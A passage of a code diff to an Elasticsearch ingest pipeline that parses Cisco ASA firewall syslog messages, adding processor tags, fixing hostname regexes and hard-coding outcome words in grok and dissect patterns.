if: "ctx._temp_.cisco.message_id == '111004' && ctx?._temp_?.cisco?.cli_outcome == 'OK'" - - set: - field: event.outcome - description: "111004" - value: "failure" - if: "ctx._temp_.cisco.message_id == '111004' && ctx?._temp_?.cisco?.cli_outcome == 'FAILED'" - - remove: - field: _temp_.cisco.cli_outcome - ignore_missing: true - - append: - field: event.type - description: "111004" - value: "change" - if: "ctx._temp_.cisco.message_id == '111004'" + pattern: "%{source.address} end configuration: %{_temp_.outcome}" - grok: if: "ctx._temp_.cisco.message_id == '111009'" + tag: parse_111009 description: "111009" field: "message" patterns: - "^%{NOTSPACE} '%{NOTSPACE:server.user.name}' executed %{NOTSPACE} %{GREEDYDATA:_temp_.cisco.command_line_arguments}" - grok: if: "ctx._temp_.cisco.message_id == '111010'" + tag: parse_111010 field: "message" description: "111010" patterns: - "User '%{NOTSPACE:server.user.name}', running %{QUOTEDSTRING} from IP %{IP:source.address}, executed %{QUOTEDSTRING:_temp_.cisco.command_line_arguments}" - grok: if: "ctx._temp_.cisco.message_id == '113004'" + tag: parse_113004 field: "message" description: "113004" patterns: @@ -455,9 +377,10 @@ processors: CISCO_USER: (?:\*\*\*\*\*|(?:(?:LOCAL\\)?(?:%{HOSTNAME}\\)?%{USERNAME}\$?(?:@%{HOSTNAME})?(?:, *%{NUMBER})?)) - grok: if: "ctx._temp_.cisco.message_id == '113005'" + tag: parse_113005 description: "113005" field: "message" - patterns: + patterns: - "AAA user %{AUTH} Rejected(%{SPACE})?: reason = %{REASON:_temp_.cisco.rejection_reason}(%{SPACE})?: server = %{IP:destination.address}(%{SPACE})?: user = ?%{CISCO_USER:source.user.name}(%{SPACE})?: user IP = %{IPORNONE}" pattern_definitions: AUTH: (authentication|authorization) @@ -466,6 +389,7 @@ processors: IPORNONE: (%{IP:source.address}|None) - grok: if: "ctx._temp_.cisco.message_id == '113012'" + tag: parse_113012 field: "message" description: "113012" patterns: @@ -474,6 +398,7 @@ processors: CISCO_USER: (?:\*\*\*\*\*|(?:(?:LOCAL\\)?(?:%{HOSTNAME}\\)?%{USERNAME}\$?(?:@%{HOSTNAME})?(?:, *%{NUMBER})?)) - grok: if: "ctx._temp_.cisco.message_id == '113015'" + tag: parse_113015 field: "message" description: "113015" patterns: @@ -484,44 +409,50 @@ processors: - dissect: if: "ctx._temp_.cisco.message_id == '113019'" + tag: parse_113019 field: "message" description: "113019" pattern: "Group = %{source.user.group.name}, Username = %{source.user.name}, IP = %{destination.address}, Session disconnected. Session Type: %{_temp_.cisco.session_type}, Duration: %{_temp_.duration_hms}, Bytes xmt: %{source.bytes}, Bytes rcv: %{destination.bytes}, Reason: %{event.reason}" - dissect: if: "ctx._temp_.cisco.message_id == '113021'" + tag: parse_113021 field: "message" description: "113021" pattern: "Attempted console login failed. User %{source.user.name} did NOT have appropriate Admin Rights." - dissect: if: "ctx._temp_.cisco.message_id == '113040'" + tag: parse_113040 field: "message" description: "113040" pattern: "Terminating the VPN connection attempt from %{source.user.group.name}. Reason: This connection is group locked to %{}." - grok: if: '["113029","113030","113031","113032","113033","113034","113035","113036","113038","113039"].contains(ctx._temp_.cisco.message_id)' + tag: parse_113029-113039 field: "message" description: "113029, 113030, 113031, 113032, 113033, 113034, 113035, 113036, 113038, 113039" patterns: - "Group <%{NOTSPACE:source.user.group.name}> User <%{CISCO_USER:source.user.name}> IP <%{IP:source.address}>" - "Group %{NOTSPACE:source.user.group.name} User %{CISCO_USER:source.user.name} IP %{IP:source.address}" pattern_definitions: - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" CISCO_USER: (?:\*\*\*\*\*|(?:(?:LOCAL\\)?(?:%{HOSTNAME}\\)?%{USERNAME}\$?(?:@%{HOSTNAME})?(?:, *%{NUMBER})?)) - grok: if: '["302013", "302015"].contains(ctx._temp_.cisco.message_id)' + tag: parse_302013-302015 field: "message" description: "302013, 302015" patterns: - Built %{NOTSPACE:network.direction} %{GREEDYDATA:_temp_.var_302013_302015} - grok: if: '["302013", "302015"].contains(ctx._temp_.cisco.message_id) && ctx.network.direction == "inbound"' + tag: parse_302013-302015_inbound field: "_temp_.var_302013_302015" description: "inbound: 302013, 302015" patterns: - ^%{NOTSPACE:network.transport} connection %{NUMBER:_temp_.cisco.connection_id} for %{NOTCOLON:_temp_.cisco.source_interface}:%{IPORHOST:source.address}/%{NUMBER:source.port} \(%{IPORHOST:_temp_.natsrcip}/%{NUMBER:_temp_.cisco.mapped_source_port}\)(\(%{CISCO_USER_OR_SGT_SRC}\))? to %{NOTCOLON:_temp_.cisco.destination_interface}:%{NOTSPACE:destination.address}/%{NUMBER:destination.port} \(%{NOTSPACE:_temp_.natdstip}/%{NUMBER:_temp_.cisco.mapped_destination_port}\)(\(%{CISCO_USER_OR_SGT_DST}\))?( \(%{CISCO_USER:_temp_.cisco.termination_user}\))?%{GREEDYDATA} pattern_definitions: - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" NOTCOLON: "[^:]*" CISCO_USER_OR_SGT_SRC: (?:%{CISCO_USER:_temp_.cisco.source_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.source_user_or_sgt}|\((?:%{CISCO_USER:_temp_.cisco.source_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.source_user_or_sgt})\)) @@ -533,12 +464,13 @@ processors: # https://www.cisco.com/c/en/us/td/docs/security/asa/syslog/b_syslog/syslogs3.html#con_4770603 - grok: if: '["302013", "302015"].contains(ctx._temp_.cisco.message_id) && ctx.network.direction == "outbound"' + tag: parse_302013-302015_outbound field: "_temp_.var_302013_302015" description: "outbound: 302013, 302015" patterns: - ^%{NOTSPACE:network.transport} connection %{NUMBER:_temp_.cisco.connection_id} for %{NOTCOLON:_temp_.cisco.destination_interface}:%{IPORHOST:destination.address}/%{NUMBER:destination.port} \(%{IPORHOST:_temp_.natdstip}/%{NUMBER:_temp_.cisco.mapped_destination_port}\)(\(%{CISCO_USER_OR_SGT_SRC}\))? to %{NOTCOLON:_temp_.cisco.source_interface}:%{NOTSPACE:source.address}/%{NUMBER:source.port} \(%{NOTSPACE:_temp_.natsrcip}/%{NUMBER:_temp_.cisco.mapped_source_port}\)(\(%{CISCO_USER_OR_SGT_DST}\))?( \(%{CISCO_USER:_temp_.cisco.termination_user}\))?%{GREEDYDATA} pattern_definitions: - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" NOTCOLON: "[^:]*" CISCO_USER_OR_SGT_SRC: (?:%{CISCO_USER:_temp_.cisco.source_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.source_user_or_sgt}|\((?:%{CISCO_USER:_temp_.cisco.source_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.source_user_or_sgt})\)) @@ -547,34 +479,33 @@ processors: CISCO_SGT: (?:, *)?%{NUMBER}(?::%{WORD})? - dissect: if: "ctx._temp_.cisco.message_id == '303002'" + tag: parse_303002 field: "message" description: "303002" pattern: "%{network.protocol} connection from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}, user %{client.user.name} %{} file %{file.path}" - grok: if: "ctx._temp_.cisco.message_id == '305012'" + tag: parse_305012 field: "message" description: "305012" patterns: - Teardown %{DATA} %{NOTSPACE:network.transport} translation from %{NOTCOLON:_temp_.cisco.source_interface}:%{IPORHOST:source.address}/%{NUMBER:source.port}(\s*\(%{CISCO_USER:_temp_.cisco.source_username}\))? to %{NOTCOLON:_temp_.cisco.destination_interface}:%{IP:destination.address}/%{NUMBER:destination.port} duration %{DURATION:_temp_.duration_hms} pattern_definitions: + USERNAME: "[^@$]*" NOTCOLON: "[^:]*" - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" - CISCO_USER: (?:\*\*\*\*\*|(?:(?:LOCAL\\)?(%{HOSTNAME}\\)?(?:%{USERNAME})?\$?(?:@%{HOSTNAME})?(?:, *%{NUMBER})?(?:%{NUMBER}:%{DATA})?)) + CISCO_USER: (?:\*\*\*\*\*|(?:(?:LOCAL\\)?(%{HOSTNAME}\\)?(?:%{USERNAME})\$?(?:@%{HOSTNAME})?(?:, *%{NUMBER})?(?:%{NUMBER}:%{DATA})?)) DURATION: "%{INT}:%{MINUTE}:%{SECOND}" - - set: - if: '["302020"].contains(ctx._temp_.cisco.message_id)' - field: "event.action" - value: "flow-creation" - description: "302020" - grok: if: "ctx._temp_.cisco.message_id == '302020'" + tag: parse_302020 field: "message" description: "302020" patterns: - "Built %{NOTSPACE:network.direction} %{NOTSPACE:network.protocol} connection for faddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSDESTIPORHOST}/%{NUMBER}\\s*(?:\\(%{CISCO_USER_OR_SGT_DST}\\) )?gaddr (?:%{NOTCOLON}:)?%{MAPPEDSRC}/%{NUMBER} laddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSSOURCEIPORHOST}/%{NUMBER}\\s*(?:\\(%{CISCO_USER_OR_SGT_SRC}\\) )?(type %{NUMBER:_temp_.cisco.icmp_type} code %{NUMBER:_temp_.cisco.icmp_code})?" pattern_definitions: - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" NOTCOLON: "[^:]*" ECSSOURCEIPORHOST: "(?:%{IP:source.address}|%{HOSTNAME:source.domain})" @@ -586,48 +517,51 @@ processors: CISCO_SGT: (?:, *)?%{NUMBER}(?::%{WORD})? - dissect: if: "ctx._temp_.cisco.message_id == '302022'" + tag: parse_302022 field: "message" description: "302022" pattern: "Built %{} stub %{network.transport} connection for %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} %{} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} %{}" - dissect: if: "ctx._temp_.cisco.message_id == '302023'" + tag: parse_302023 field: "message" description: "302023" pattern: "Teardown stub %{network.transport} connection for %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} duration %{_temp_.duration_hms} forwarded bytes %{network.bytes} %{event.reason}" - grok: if: "ctx._temp_.cisco.message_id == '304001'" + tag: parse_304001 field: "message" description: "304001" patterns: - "(%{NOTSPACE:source.user.name}@)?%{IP:source.address}(\\(%{DATA}\\))? %{DATA} (%{NOTSPACE}@)?%{IPORHOST:destination.address}:%{GREEDYDATA:url.original}" - - set: - if: "ctx._temp_.cisco.message_id == '304001'" - field: "event.outcome" - description: "304001" - value: allowed - dissect: if: "ctx._temp_.cisco.message_id == '304002'" + tag: parse_304002 field: "message" description: "304002" - pattern: "Access %{event.outcome} URL %{url.original} SRC %{source.address} %{}EST %{destination.address} on interface %{_temp_.cisco.source_interface}" + pattern: "Access denied URL %{url.original} SRC %{source.address} %{}EST %{destination.address} on interface %{_temp_.cisco.source_interface}" - grok: if: "ctx._temp_.cisco.message_id == '305011'" + tag: parse_305011 field: "message" description: "305011" patterns: - Built %{NOTSPACE} %{NOTSPACE:network.transport} translation from %{NOTSPACE:_temp_.cisco.source_interface}:%{IPORHOST:source.address}/%{NUMBER:source.port}(\(%{NOTSPACE:source.user.name}\))? to %{NOTSPACE:_temp_.cisco.destination_interface}:%{IP:destination.address}/%{NUMBER:destination.port} - dissect: if: "ctx._temp_.cisco.message_id == '313001'" + tag: parse_313001 field: "message" description: "313001" - pattern: "%{event.outcome} %{network.transport} type=%{_temp_.cisco.icmp_type}, code=%{_temp_.cisco.icmp_code} from %{source.address} on interface %{_temp_.cisco.source_interface}" + pattern: "Denied %{network.transport} type=%{_temp_.cisco.icmp_type}, code=%{_temp_.cisco.icmp_code} from %{source.address} on interface %{_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '313004'" + tag: parse_313004 field: "message" description: "313004" - pattern: "%{event.outcome} %{network.transport} type=%{_temp_.cisco.icmp_type}, from%{}addr %{source.address} on interface %{_temp_.cisco.source_interface} to %{destination.address}: no matching session" + pattern: "Denied %{network.transport} type=%{_temp_.cisco.icmp_type}, from%{}addr %{source.address} on interface %{_temp_.cisco.source_interface} to %{destination.address}: no matching session" - grok: if: "ctx._temp_.cisco.message_id == '313005'" + tag: parse_313005 field: "message" description: "313005" patterns: @@ -638,7 +572,7 @@ processors: - "No matching connection for ICMP error message: %{NOTSPACE:network.transport} src %{NOTCOLON:_temp_.cisco.source_interface}:%{IPORHOST}(\\(%{CISCO_USER_OR_SGT_SRC}\\))? dst %{NOTCOLON:_temp_.cisco.destination_interface}:%{IPORHOST}(\\(%{CISCO_USER_OR_SGT_DST}\\))? \\(type %{NUMBER:_temp_.cisco.icmp_type}, code %{NUMBER:_temp_.cisco.icmp_code}\\) on %{NOTCOLON} interface.%{SPACE}Original IP payload: %{NOTSPACE:input.type} src %{IPORHOST:source.address}(/%{NUMBER:source.port})? dst %{IPORHOST:destination.address}(/%{NUMBER:destination.port})?[.]?" pattern_definitions: NOTCOLON: "[^:]*" - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" CISCO_USER_OR_SGT_SRC: (?:%{CISCO_USER:_temp_.cisco.source_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.source_user_or_sgt}|\((?:%{CISCO_USER:_temp_.cisco.source_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.source_user_or_sgt})\)) CISCO_USER_OR_SGT_DST: (?:%{CISCO_USER:_temp_.cisco.destination_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.destination_user_or_sgt}|\((?:%{CISCO_USER:_temp_.cisco.destination_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.destination_user_or_sgt})\)) @@ -646,24 +580,28 @@ processors: CISCO_SGT: (?:, *)?%{NUMBER}(?::%{WORD})? - dissect: if: "ctx._temp_.cisco.message_id == '313008'" + tag: parse_313008 field: "message" description: "313008" - pattern: "%{event.outcome} %{network.transport} type=%{_temp_.cisco.icmp_type}, code=%{_temp_.cisco.icmp_code} from %{source.address} on interface %{_temp_.cisco.source_interface}" + pattern: "Denied %{network.transport} type=%{_temp_.cisco.icmp_type}, code=%{_temp_.cisco.icmp_code} from %{source.address} on interface %{_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '313009'" + tag: parse_313009 field: "message" description: "313009" - pattern: "%{event.outcome} invalid %{network.transport} code %{_temp_.cisco.icmp_code}, for %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}" + pattern: "Denied invalid %{network.transport} code %{_temp_.cisco.icmp_code}, for %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}" - dissect: if: "ctx._temp_.cisco.message_id == '322001'" + tag: parse_322001 field: "message" description: "322001" - pattern: "%{event.outcome} MAC address %{source.mac}, possible spoof attempt on interface %{_temp_.cisco.source_interface}" + pattern: "Deny MAC address %{source.mac}, possible spoof attempt on interface %{_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '338001'" + tag: parse_338001 field: "message" description: "338001" - pattern: "Dynamic filter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" + pattern: "Dynamic filter %{} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338001'" field: "server.domain" @@ -672,9 +610,10 @@ processors: ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338002'" + tag: parse_338002 field: "message" description: "338002" - pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}" + pattern: "Dynamic %{}ilter %{} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}" - set: if: "ctx._temp_.cisco.message_id == '338002'" field: "server.domain" @@ -683,19 +622,22 @@ processors: ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338003'" + tag: parse_338003 field: "message" description: "338003" - pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" + pattern: "Dynamic %{}ilter %{} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - dissect: if: "ctx._temp_.cisco.message_id == '338004'" + tag: parse_338004 field: "message" description: "338004" - pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" + pattern: "Dynamic %{}ilter %{} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - dissect: if: "ctx._temp_.cisco.message_id == '338005'" + tag: parse_338005 field: "message" description: "338005" - pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" + pattern: "Dynamic %{}ilter %{} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338005'" field: "server.domain" @@ -704,9 +646,10 @@ processors: ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338006'" + tag: parse_338006 field: "message" description: "338006" - pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" + pattern: "Dynamic %{}ilter %{} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338006'" field: "server.domain" @@ -715,19 +658,22 @@ processors: ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338007'" + tag: parse_338007 field: "message" description: "338007" - pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" + pattern: "Dynamic %{}ilter %{} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - dissect: if: "ctx._temp_.cisco.message_id == '338008'" + tag: parse_338008 field: "message" description: "338008" - pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" + pattern: "Dynamic %{}ilter %{} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - dissect: if: "ctx._temp_.cisco.message_id == '338101'" + tag: parse_338101 field: "message" description: "338101" - pattern: "Dynamic %{}ilter %{event.outcome} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}" + pattern: "Dynamic %{}ilter %{} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}" - set: if: "ctx._temp_.cisco.message_id == '338101'" field: "server.domain" @@ -736,9 +682,10 @@ processors: ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338102'" + tag: parse_338102 field: "message" description: "338102" - pattern: "Dynamic %{}ilter %{event.outcome} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}" + pattern: "Dynamic %{}ilter %{} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}" - set: if: "ctx._temp_.cisco.message_id == '338102'" field: "server.domain" @@ -747,19 +694,22 @@ processors: ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338103'" + tag: parse_338103 field: "message" description: "338103" - pattern: "Dynamic %{}ilter %{event.outcome} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{}" + pattern: "Dynamic %{}ilter %{} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{}" - dissect: if: "ctx._temp_.cisco.message_id == '338104'" + tag: parse_338104 field: "message" description: "338104" - pattern: "Dynamic %{}ilter %{event.outcome} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to 